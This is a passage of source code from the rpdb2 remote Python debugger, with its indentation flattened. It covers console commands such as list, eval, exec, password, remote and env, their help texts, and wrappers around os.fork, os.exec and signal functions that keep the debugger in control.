fEntire = (_args[0] == SOURCE_ENTIRE_FILE)
fCurrent = (_args[0] == '')
fLine = False
l = 1
try:
if len(_args) > 1:
nlines = int(_args[1])
else:
nlines = self.m_last_nlines
if not (fAll or fMore or fLess or fEntire or fCurrent):
l = int(_args[0])
fLine = True
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode and fAll:
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
if fMore and self.m_last_source_line:
l = max(1, self.m_last_source_line + self.m_last_nlines // 2 + 1)
fLine = True
elif fLess and self.m_last_source_line:
l = max(1, self.m_last_source_line - (self.m_last_nlines - 1) // 2 - nlines)
fLine = True
try:
if fEntire:
r = [self.m_session_manager.get_source_file(_filename, -1, -1)]
elif fLine:
r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
elif _filename != '':
r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
else:
r = self.m_session_manager.get_source_lines(nlines, fAll)
if len(r) == 0:
self.printer(STR_NO_THREADS_FOUND)
return
m = None
for d in r:
tid = d.get(DICT_KEY_TID, 0)
filename = d.get(DICT_KEY_FILENAME, '')
breakpoints = d.get(DICT_KEY_BREAKPOINTS, {})
source_lines = d.get(DICT_KEY_LINES, [])
first_lineno = d.get(DICT_KEY_FIRST_LINENO, 0)
if len(r) == 1 and first_lineno != 0:
l = first_lineno
fBroken = d.get(DICT_KEY_BROKEN, False)
frame_event = d.get(DICT_KEY_EVENT, '')
frame_lineno = d.get(DICT_KEY_FRAME_LINENO, 0)
if m is not None:
_print('', self.m_stdout)
_print(STR_SOURCE_LINES % (tid, filename), self.m_stdout)
for i, line in enumerate(source_lines):
lineno = first_lineno + i
if lineno != frame_lineno:
m = ''
elif not fBroken:
m = SOURCE_STATE_UNBROKEN + SYMBOL_MARKER
elif frame_event == 'call':
m = SOURCE_EVENT_CALL + SYMBOL_MARKER
elif frame_event == 'line':
m = SOURCE_EVENT_LINE + SYMBOL_MARKER
elif frame_event == 'return':
m = SOURCE_EVENT_RETURN + SYMBOL_MARKER
elif frame_event == 'exception':
m = SOURCE_EVENT_EXCEPTION + SYMBOL_MARKER
if breakpoints.get(lineno, None) == STATE_ENABLED:
b = SOURCE_BP_ENABLED
elif breakpoints.get(lineno, None) == STATE_DISABLED:
b = SOURCE_BP_DISABLED
else:
b = ''
line = line.replace('\t', ' ' * PYTHON_TAB_WIDTH)
_print(' %2s %1s %5d %s' % (m, b, lineno, calc_prefix(line[:-1], 60)), self.m_stdout)
if fAll or fEntire:
self.m_last_source_line = None
elif len(source_lines) != 0:
self.m_last_source_line = [l + (nlines - 1) // 2, frame_lineno][l == -1]
self.m_last_nlines = nlines
except (InvalidFrame, IOError):
self.printer(STR_SOURCE_NOT_FOUND)
except (NoExceptionFound, NoThreads):
self.m_session_manager.report_exception(*sys.exc_info())
do_l = do_list
def do_up(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi - 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_down(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi + 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def evaluate_job(self, sync_event, expr):
try:
(value, warning, error) = self.m_session_manager.evaluate(expr)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
_print(value, self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_eval(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
sync_event = threading.Event()
t = threading.Thread(target = self.evaluate_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_v = do_eval
def execute_job(self, sync_event, suite):
try:
(warning, error) = self.m_session_manager.execute(suite)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_exec(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
_print(STR_OUTPUT_WARNING, self.m_stdout)
sync_event = threading.Event()
t = threading.Thread(target = self.execute_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_x = do_exec
def do_encoding(self, arg):
if arg == '':
encoding, fraw = self.m_session_manager.get_encoding()
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
if fraw:
encoding += ', ' + ENCODING_RAW
_print(STR_ENCODING_MODE % encoding, self.m_stdout)
return
if ',' in arg:
encoding, raw = arg.split(',')
else:
encoding, raw = arg, ''
encoding = encoding.strip()
if encoding == '':
encoding, fraw = self.m_session_manager.get_encoding()
fraw = 'raw' in raw
self.m_session_manager.set_encoding(encoding, fraw)
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
_print(STR_ENCODING_BAD, self.m_stdout)
if fraw:
encoding += ', ' + ENCODING_RAW
_print(STR_ENCODING_MODE_SET % encoding, self.m_stdout)
def do_thread(self, arg):
if self.fAnalyzeMode and (arg != ''):
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
try:
if arg != '':
tid = int(arg)
self.m_session_manager.set_thread(tid)
_print(STR_THREAD_FOCUS_SET, self.m_stdout)
return
(current_thread_id, tl) = self.m_session_manager.get_thread_list()
_print(STR_ACTIVE_THREADS, self.m_stdout)
for i, t in enumerate(tl):
m = ['', SYMBOL_MARKER][t[DICT_KEY_TID] == current_thread_id]
state = [STATE_RUNNING, STR_STATE_BROKEN][t[DICT_KEY_BROKEN]]
_print(' %1s %3d %5d %-15s %s' % (m, i, t[DICT_KEY_TID], t[DICT_KEY_NAME], state[:25]), self.m_stdout)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
except ThreadNotFound:
self.printer(STR_THREAD_NOT_FOUND)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_t = do_thread
def do_analyze(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.set_analyze(not self.fAnalyzeMode)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_a = do_analyze
def do_synchro(self, arg):
if arg == '':
fsynchronicity = self.m_session_manager.get_synchronicity()
_print(STR_SYNCHRONICITY_MODE % str(fsynchronicity), self.m_stdout)
return
if arg == str(True):
fsynchronicity = True
elif arg == str(False):
fsynchronicity = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_synchronicity(fsynchronicity)
def do_trap(self, arg):
if arg == '':
ftrap = self.m_session_manager.get_trap_unhandled_exceptions()
_print(STR_TRAP_MODE % str(ftrap), self.m_stdout)
return
if arg == str(True):
ftrap = True
elif arg == str(False):
ftrap = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_trap_unhandled_exceptions(ftrap)
def do_fork(self, arg):
(ffork_into_child, ffork_auto) = self.m_session_manager.get_fork_mode()
if arg == '':
x = [FORK_PARENT, FORK_CHILD][ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][ffork_auto]
_print(STR_FORK_MODE % (x, y), self.m_stdout)
return
arg = arg.lower()
if FORK_PARENT in arg:
ffork_into_child = False
elif FORK_CHILD in arg:
ffork_into_child = True
if FORK_AUTO in arg:
ffork_auto = True
elif FORK_MANUAL in arg:
ffork_auto = False
self.m_session_manager.set_fork_mode(ffork_into_child, ffork_auto)
def do_password(self, arg):
if arg == '':
_rpdb2_pwd = self.m_session_manager.get_password()
if _rpdb2_pwd is None:
_print(STR_PASSWORD_NOT_SET, self.m_stdout)
else:
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
return
_rpdb2_pwd = arg.strip('"\'')
try:
self.m_session_manager.set_password(_rpdb2_pwd)
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
except BadArgument:
_print(STR_PASSWORD_BAD, self.m_stdout)
def do_remote(self, arg):
if arg == '':
fAllowRemote = self.m_session_manager.get_remote()
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
return
if arg == str(True):
fAllowRemote = True
elif arg == str(False):
fAllowRemote = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_remote(fAllowRemote)
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
def do_env(self, arg):
env = self.m_session_manager.get_environ()
if arg == '':
if len(env) == 0:
_print(STR_ENVIRONMENT_EMPTY, self.m_stdout)
return
_print(STR_ENVIRONMENT, self.m_stdout)
for k, v in env:
_print('%s=%s' % (k, v), self.m_stdout)
return
if arg[:2] == '-d':
k = arg[2:].strip()
_env = [(_k, _v) for (_k, _v) in env if _k != k]
self.m_session_manager.set_environ(_env)
return
try:
k, v = arg.split('=')
k = k.strip()
v = v.strip()
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
_env = [(_k, _v) for (_k, _v) in env if _k != k]
_env.append((k, v))
self.m_session_manager.set_environ(_env)
def do_stop(self, arg):
self.m_session_manager.stop_debuggee()
def do_exit(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.m_session_manager.get_state() != STATE_DETACHED:
try:
self.do_stop('')
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
_print('', self.m_stdout)
return True
do_EOF = do_exit
def do_copyright(self, arg):
self.print_notice(COPYRIGHT_NOTICE)
def do_license(self, arg):
self.print_notice(LICENSE_NOTICE + COPY_OF_THE_GPL_LICENSE)
def do_credits(self, arg):
self.print_notice(CREDITS_NOTICE)
def do_help(self, arg):
cmd.Cmd.do_help(self, arg)
if arg == '':
help_notice = """Security:
----------------
password - Get or set the channel password.
remote - Get or set "allow connections from remote machines" mode.
Session Control:
-----------------
env - Display or set the environment setting for new sessions.
host - Display or change host.
attach - Display scripts or attach to a script on host.
detach - Detach from script.
launch - Start a script and attach to it.
restart - Restart a script.
stop - Shutdown the debugged script.
exit - Exit from debugger.
Debuggee Control:
-----------------
break - Request an immediate break.
step - Continue to the next execution line.
next - Continue to the next execution line in the current frame.
return - Continue until the debugger is about to return from the frame.
jump - Jump to a line in the current scope.
go - Continue execution.
Breakpoints Control:
--------------------
bp - Set a break point.
bd - Disable a breakpoint.
be - Enable a breakpoint.
bc - Clear (delete) a breakpoint.
bl - List all breakpoints.
load - Load session breakpoints.
save - save session breakpoints.
Misc:
-----
thread - Display threads or switch to a particular thread.
list - List source code.
stack - Display stack trace.
up - Go up one frame in stack.
down - Go down one frame in stack.
encoding - Set the source encoding used by exec and eval commands.
eval - Evaluate expression in the context of the current frame.
exec - Execute suite in the context of the current frame.
analyze - Toggle analyze last exception mode.
trap - Get or set "trap unhandled exceptions" mode.
fork - Get or set fork handling mode.
synchro - Get or set synchronicity mode.
License:
----------------
copyright - Print copyright notice.
license - Print license.
credits - Print credits information.
type help <topic> for futher information."""
self.print_notice(help_notice)
def help_copyright(self):
_print("""copyright
Print copyright notice.""", self.m_stdout)
def help_license(self):
_print("""license
Print license.""", self.m_stdout)
def help_credits(self):
_print("""credits
Print credits information.""", self.m_stdout)
def help_help(self):
_print("""help <cmd>
Print help for command <cmd>.
On the other hand I guess that you already know that, don't you?""", self.m_stdout)
def help_analyze(self):
_print("""analyze
(shorthand - a)
Toggle analyze last exception mode.
The following changes to the debugger behavior apply in analyze mode:
The debugger prompt changes to 'Analyze>'.
'go', 'step', 'next', and 'return' are not allowed.
'thread' does not allow to change the thread focus.
'stack' allows no arguments.
'list' does not accept the '*' (all threads) argument
'stack', 'list', 'eval', 'exec', 'up', and 'down' operate on the thrown
exception.""", self.m_stdout)
help_a = help_analyze
def help_password(self):
_print("""password <password>
Get or set the channel password.
Communication between the console and the debuggee is always authenticated and
optionally encrypted. The password (A secret known to the console and the
debuggee alone) governs both security methods. The password is never
communicated between the two components on the communication channel.
A password is always required since unsecured communication between the
console and the debuggee might expose your machine to attacks.""", self.m_stdout)
def help_remote(self):
_print("""remote [True | False]
Get or set "allow connections from remote machines" mode.
When set to False:
Newly launched debuggees will listen on localhost only. In this mode, debugger
consoles on remote machines will NOT BE able to see or attach to the debuggee.
When set to True:
Newly launched debuggees will listen on INADDR_ANY. In this mode, debugger
consoles on remote machines will BE able to see and attach to the debuggee.""", self.m_stdout)
def help_trap(self):
_print("""trap [True | False]
Get or set "trap unhandled exceptions" mode.
When set to False:
Debuggee will ignore unhandled exceptions.
When set to True:
Debuggee will pause on unhandled exceptions for inspection.""", self.m_stdout)
def help_synchro(self):
_print("""synchro [True | False]
Get or set the synchronicity mode.
Traditional Python debuggers that use the inspected thread
(usually the main thread) to query or modify the script
name-space have to wait until the script hits a break-point.
Synchronicity allows the debugger to query and modify the
script name-space even if its threads are still running or
blocked in C library code by using special worker threads.
In some rare cases querying or modifying data in
synchronicity can crash the script. For example in some
Linux builds of wxPython querying the state of wx objects
from a thread other than the GUI thread can crash the
script. If this happens or if you want to restrict these
operations to the inspected thread, turn synchronicity off.
Default is True.""", self.m_stdout)
def help_fork(self):
_print("""fork [parent | child] [manual | auto]
Get or set fork handling mode.
Without arguments returns the current mode.
When 'parent' is specified the debugger will continue to debug the original
parent process after a fork.
When 'child' is specified the debugger will switch to debug the forked
child process after a fork.
When 'manual' is specified the debugger will pause before doing a fork.
When 'auto' is specified the debugger will go through the fork without
pausing and will make the forking decision based on the parent/child
setting.
WARNING:
On some Posix OS such as FreeBSD, Stepping into the child fork
can result in termination of the child process since the debugger
uses threading for its operation and on these systems threading and
forking can conflict.
""", self.m_stdout)
def help_stop(self):
_print("""stop
Shutdown the debugged script.""", self.m_stdout)
def help_launch(self):
_print("""launch [-k] <script_name> [<script_args>]
Start script <script_name> and attach to it.
-k Don't change the current working directory. By default the working
directory of the launched script is set to its folder.""", self.m_stdout)
def help_restart(self):
_print("""restart
Restart a script with same arguments from last launch.""", self.m_stdout)
def help_attach(self):
_print("""attach [<arg>]
Without an argument, 'attach' prints the scripts available for debugging
on the selected host. To select a host use the 'host' command. A script is
considered available for debugging only if it is using the rpdb2 module or
has been executed by the debugger.
If the debugger is already attached to a script, a special character will
mark that script in the list.
When <arg> is an integer the debugger will try to attach to a script with
that pid.
When <arg> is a string the debugger will try to attach to a script
with that name in the list.""", self.m_stdout)
def help_detach(self):
_print("""detach
Detach from the script the debugger is currently attached to. The detached
script will continue execution.""", self.m_stdout)
def help_break(self):
_print("""break
(shorthand - b)
Request script to break (pause execution as if it hit a breakpoint).
The 'break' command returns immdeiately but the break is only established
when an active thread submits to the debugger control. If a thread is
doing a system call or executing C code, this will happen only when
it returns to do python code.""", self.m_stdout)
help_b = help_break
def help_bp(self):
_print("""bp [<filename>':'] (<line> | <scope>) [',' <expr>]
Set a breakpoint.
<filename> - either the filename or the module name.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.
<expr> - condition to evaluate in the context of the frame. If it
evaluates to 'True' the break point will break into the debugger.
In case the <filemame> is omitted, the current file is assumed. In this case
the debuggee has to be waiting at break point.
Examples:
bp test_file.py:20
bp test_file.py:MyClass.Foo
bp 304
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
def help_be(self):
_print("""be (<id_list> | '*')
Enable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - Enable all breakpoints.""", self.m_stdout)
def help_bd(self):
_print("""bd (<id_list> | '*')
Disable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - disable all breakpoints.""", self.m_stdout)
def help_bc(self):
_print("""bc (<id_list> | '*')
Clear (delete) breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - clear all breakpoints.""", self.m_stdout)
def help_bl(self):
_print("""bl
List all breakpoints, sorted by their id.""", self.m_stdout)
def help_load(self):
_print("""load [<filename>]
Load breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
def help_save(self):
_print("""save [<filename>]
save breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
def help_go(self):
_print("""go [[<filename>':'] (<line> | <scope>)]
(shorthand - g)
Resume execution of a script that is waiting at break point.
If an argument is present, continue execution until that argument is reached.
<filename> - is the file name which basically is the script's name without
the '.py' extension.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.""", self.m_stdout)
help_g = help_go
def help_exit(self):
_print("""exit
Exit the debugger. If the debugger is attached to a script, the debugger
will attempt to detach from the script first.""", self.m_stdout)
help_EOF = help_exit
def help_host(self):
_print("""host [<arg>]
Without an argument, 'host' prints the current selected host.
With an argument <arg>, 'host' attempts to resolve <arg> to a known ip
address or a domain name. If it is successful, that host will become the
selected host.
The default selected host is the local host.
Subsequent 'attach' commands will be done on the selected host.
Type 'help attach' for more information.""", self.m_stdout)
def help_stack(self):
_print("""stack [<tid> | '*']
(shorthand - k)
Without an argument, 'stack' prints the stack trace of the focused thread.
If the thread is waiting at break point a special character will mark the
focused frame.
<tid> - print the stack of thread <tid>
'*' - print the stacks of all active threads.
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_k = help_stack
def help_list(self):
_print("""list [<file_name>:][<line_no> | '+' | '-' | '^' | '*'] [',' <nlines>]
(shorthand - l)
Without an argument, 'list' prints the source lines around the current line
of the focused thread in the focused frame. A special character sequence will
mark the current line according to the event:
'C>' - call - A function is called.
'L>' - line - The interpreter is about to execute a new line of code.
'R>' - return - A function is about to return.
'E>' - exception - An exception has been thrown.
'*>' - running - The thread is running.
If a breakpoint is assigned to a line, that line will be marked with:
'B' - if the breakpoint is enabled
'D' - if the breakpoint is disabled
<file_name> - List source from filename
<line_no> - Print the source lines around that line number in the same file
of the current line.
'+' - Print the next lines in the file.
'-' - Print the previous lines in the file.
'^' - Print the entire file.
'*' - Print the source lines for each of the active threads.
<nlines> - Print <nlines> of source
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_l = help_list
def help_thread(self):
_print("""thread [<no> | <tid>]
(shorthand - t)
Without an argument, 'thread' prints the list of known active threads, with
their corresponding state, which can be either 'running' or
'waiting at break point'. A special character will mark the focused thread.
With an argument <tid>, 'thread' will attempt to set the debugger focus to
the thread of that tid.
With an argument <no>, 'thread' will attempt to set the debugger focus to
the thread of that order in the thread list.
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
help_t = help_thread
def help_jump(self):
_print("""jump <lineno>
(shorthand - j)
Jump to line <lineno> in the current scope.""", self.m_stdout)
help_j = help_jump
def help_next(self):
_print("""next
(shorthand - n)
Continue execution until the next line in the current function
is reached or it returns.""", self.m_stdout)
help_n = help_next
def help_step(self):
_print("""step
(shorthand - s)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function).""", self.m_stdout)
help_s = help_step
def help_return(self):
_print("""next
(shorthand - r)
Continue execution until the current function returns.""", self.m_stdout)
help_r = help_return
def help_up(self):
_print("""up
move the debugger focus one frame up the stack of the debugged thread
(closer to the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
def help_down(self):
_print("""down
move the debugger focus one frame down the stack of the debugged thread
(closer to the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
def help_eval(self):
_print("""eval <expr>
(shorthand - v)
Evaluate the python expression <expr> under the global and local name spaces
of the currently focused frame.
Example:
'eval locals()' - will display the dictionary of the local variables.
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_v = help_eval
def help_exec(self):
_print("""exec <stmt>
(shorthand - x)
Execute the python suite <stmt> under the global and local name spaces
of the currently focused frame.
Example:
'exec i += 1'
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_x = help_exec
def help_encoding(self):
_print("""encoding [<encoding> [, raw]]
Set the source encoding for the exec and eval commands.
Without an argument returns the current encoding.
The specified encoding can be either 'auto' or any encoding accepted
by the codecs module. If 'auto' is specified, the source encoding of
the active scope will be used, which is utf-8 by default.
The default encoding value is 'auto'.
If 'raw' is specified, strings returned by the eval command
will represent non ASCII characters as an escape sequence.""", self.m_stdout)
def help_env(self):
_print("""env [-d key | key = value]
Set the environment variables mapping. This mapping is used
when a new script is launched to modify its environment.
Example for a mapping on Windows:
env Path = %Path%;c:\\mydir
Example for a mapping on Linux:
env PATH = $PATH:~/mydir
To delete the mapping for PATH
env -d PATH
Without an argument returns the current list of mappings.
Note that the mapping will be evaluated and used to modify
the environment after the debugger engine at the debuggee
has imported the modules it requires. The order in which the
mappings will be evaluated and applied is:
last set, last evaluated.""", self.m_stdout)
#
# ---------------------------------------- Replacement Functions ------------------------------------
#
def rpdb2_import_wrapper(*args, **kwargs):
if len(args) > 0:
name = args[0]
elif 'name' in kwargs:
name = kwargs['name']
else:
return g_import(*args, **kwargs)
if name in sys.modules:
return g_import(*args, **kwargs)
#
# rpdb2 avoids stepping through this
# function (rpdb2_import_wrapper) to
# prevent confusion when stepping into
# an import statement.
#
m = g_import(*args, **kwargs)
if name != 'gtk':
return m
try:
m.gdk.threads_init()
return m
except:
pass
try:
m.threads_init()
return m
except:
pass
return m
g_import = None
if __name__ == 'rpdb2' and g_builtins_module.__import__ != rpdb2_import_wrapper:
g_import = g_builtins_module.__import__
g_builtins_module.__import__ = rpdb2_import_wrapper
def __find_eval_exec_frame_in_stack():
f = sys._getframe(0)
while f != None:
filename = f.f_code.co_filename
name = f.f_code.co_name
if DEBUGGER_FILENAME in filename and name in ['_evaluate', '_execute'] and 'redirect_exc_info' in f.f_locals:
return f
f = f.f_back
return None
def __exc_info():
f = __find_eval_exec_frame_in_stack()
if f == None:
return g_sys_exc_info()
try:
frame_index = f.f_locals['frame_index']
fException = f.f_locals['fException']
e = g_debugger.get_exception(frame_index, fException)
exc_info = (e['type'], e['value'], e['traceback'])
return exc_info
except:
return g_sys_exc_info()
g_sys_exc_info = None
if __name__ == 'rpdb2' and 'exc_info' in dir(sys) and sys.exc_info != __exc_info:
g_sys_exc_info = sys.exc_info
sys.exc_info = __exc_info
def __setrecursionlimit(rl):
global g_recursionlimit
print_debug('rl = %d' % rl)
g_recursionlimit = max(rl, 64)
rl = g_recursionlimit
if sys.version_info[:2] == (2, 6):
rl *= 3
return g_sys_setrecursionlimit(rl + 64)
g_sys_setrecursionlimit = None
if __name__ == 'rpdb2' and 'setrecursionlimit' in dir(sys) and sys.setrecursionlimit != __setrecursionlimit:
g_sys_setrecursionlimit = sys.setrecursionlimit
sys.setrecursionlimit = __setrecursionlimit
__setrecursionlimit(sys.getrecursionlimit())
def __find_debugger_frame():
frame = None
f = sys._getframe(0)
while f != None:
filename = f.f_code.co_filename
name = f.f_code.co_name
if DEBUGGER_FILENAME in filename and (name.startswith('trace_dispatch') or name == 'profile'):
frame = f
f = f.f_back
return frame
class CSignalHandler:
def __del__(self):
while len(g_signals_pending) != 0:
(handler, signum, frameobj) = g_signals_pending.pop(0)
print_debug('Handling pending signal: %s, %s' % (repr(signum), repr(frameobj)))
try:
handler(signum, frameobj)
except:
#
# Can not raise from inside a destructor. Report that handler
# exception will be ignored.
#
(t, v, tb) = sys.exc_info()
_t = safe_repr(t)
if _t.startswith("<type '"):
_t = _t.split("'")[1]
event = CEventSignalException(signum, '%s: %s' % (_t, safe_repr(v)))
g_debugger.m_event_dispatcher.fire_event(event)
def signal_handler(signum, frameobj):
frame = __find_debugger_frame()
if frame == None:
#
# A debugger tracing frame was not found in the stack.
# This means that the handler can be run without risk
# for state corruption.
#
handler = signal.getsignal(signum)
return handler(signum, frameobj)
if frame.f_code.co_name == 'profile' and frame.f_locals['event'] != 'return':
#
# signal was caught inside the profile hook but not while
# doing some debugger stuff. Call the handler but in case
# of exception schedule the debugger to re-enable the
# profile hook.
#
try:
handler = signal.getsignal(signum)
return handler(signum, frameobj)
except:
ctx = g_debugger.get_ctx(thread.get_ident())
ctx.set_tracers(fsignal_exception = True)
raise
#
# Set the handler to be run when the debugger is about
# to return from the tracing code.
#
print_debug('Intercepted signal: %s, %s' % (repr(signum), repr(frameobj)))
f = frameobj
while f != None:
if f == frame:
frameobj = frame.f_back
break
f = f.f_back
handler = signal.getsignal(signum)
g_signals_pending.append((handler, signum, frameobj))
if not 'signal_handler' in frame.f_locals:
frame.f_locals.update({'signal_handler': CSignalHandler()})
event = CEventSignalIntercepted(signum)
g_debugger.m_event_dispatcher.fire_event(event)
if signum == signal.SIGINT and g_debugger.is_waiting_for_attach():
g_debugger.set_request_go_timer(0)
def __getsignal(signum):
handler = g_signal_handlers.get(signum, g_signal_getsignal(signum))
return handler
g_signal_getsignal = None
if __name__ == 'rpdb2' and 'getsignal' in dir(signal) and signal.getsignal != __getsignal:
g_signal_getsignal = signal.getsignal
signal.getsignal = __getsignal
def __signal(signum, handler):
old_handler = __getsignal(signum)
if handler in [signal.SIG_IGN, signal.SIG_DFL]:
g_signal_signal(signum, handler)
return old_handler
g_signal_signal(signum, signal_handler)
g_signal_handlers[signum] = handler
return old_handler
g_signal_signal = None
if __name__ == 'rpdb2' and 'signal' in dir(signal) and signal.signal != __signal:
g_signal_signal = signal.signal
signal.signal = __signal
"""
def __setprofile(foo):
global g_profile
print_debug('*** setprofile to %s' % repr(foo))
traceback.print_stack(file = sys.__stderr__)
if thread_get_name(current_thread()) == 'MainThread':
g_profile = foo
g_sys_setprofile(foo)
g_sys_setprofile = None
if __name__ == 'rpdb2' and sys.setprofile != __setprofile:
g_sys_setprofile = sys.setprofile
sys.setprofile = __setprofile
"""
def __fork():
global g_forktid
if not g_fignorefork:
g_forktid = setbreak()
#
# os.fork() has been called.
#
# You can choose if you would like the debugger
# to continue with the parent or child fork with
# the 'fork' console command.
#
# For example: 'fork child' or 'fork parent'
# Type: 'help fork' for more information.
#
# WARNING:
# On some Posix OS such as FreeBSD,
# Stepping into the child fork can result in
# termination of the child process.
#
# *** RPDB2 SAYS: Read the entire comment! ***
#
return g_os_fork()
g_os_fork = None
if __name__ == 'rpdb2' and 'fork' in dir(os) and os.fork != __fork:
g_os_fork = os.fork
os.fork = __fork
def __exit(n):
global g_fos_exit
if type(n) == int:
g_fos_exit = (setbreak() != None)
#
# os._exit(n) has been called.
#
# Stepping on from this point will result
# in program termination.
#
return g_os_exit(n)
g_os_exit = None
if __name__ == 'rpdb2' and '_exit' in dir(os) and os._exit != __exit:
g_os_exit = os._exit
os._exit = __exit
def __close(fd):
global g_fos_exit
try:
if fd == g_server.m_server.socket._sock.fileno():
g_fos_exit = (setbreak() != None)
except:
pass
#
# os.close(fd) has been called by the debugged script to close
# the debugger communication channel.
#
# This can normally happen if it is trying to spawn a new process
# in its place.
#
# Stepping on from this point will result in termination of the
# debugging session.
#
return g_os_close(fd)
g_os_close = None
if __name__ == 'rpdb2' and 'close' in dir(os) and os.close != __close:
g_os_close = os.close
os.close = __close
def __dup2(fd, fd2):
global g_fos_exit
try:
if fd2 == g_server.m_server.socket._sock.fileno():
g_fos_exit = (setbreak() != None)
except:
pass
#
# os.dup2(fd, fd2) has been called by the debugged script to close
# the debugger communication channel.
#
# This can normally happen if it is trying to spawn a new process
# in its place.
#
# Stepping on from this point will result in termination of the
# debugging session.
#
return g_os_dup2(fd, fd2)
g_os_dup2 = None
if __name__ == 'rpdb2' and 'dup2' in dir(os) and os.dup2 != __dup2:
g_os_dup2 = os.dup2
os.dup2 = __dup2
def __execv(path, args):
global g_exectid
if os.path.isfile(path) and not g_fignorefork:
g_exectid = setbreak()
#
# os.execv() has been called.
#
# Stepping on from this point will result
# in termination of the debug session if
# the exec operation completes successfully.
#
return g_os_execv(path, args)
g_os_execv = None
if __name__ == 'rpdb2' and 'execv' in dir(os) and os.execv != __execv:
g_os_execv = os.execv
os.execv = __execv
def __execve(path, args, env):
global g_exectid
if os.path.isfile(path) and not g_fignorefork:
g_exectid = setbreak()
#
# os.execve() has been called.
#
# Stepping on from this point will result
# in termination of the debug session if
# the exec operation completes successfully.
#
return g_os_execve(path, args, env)
g_os_execve = None
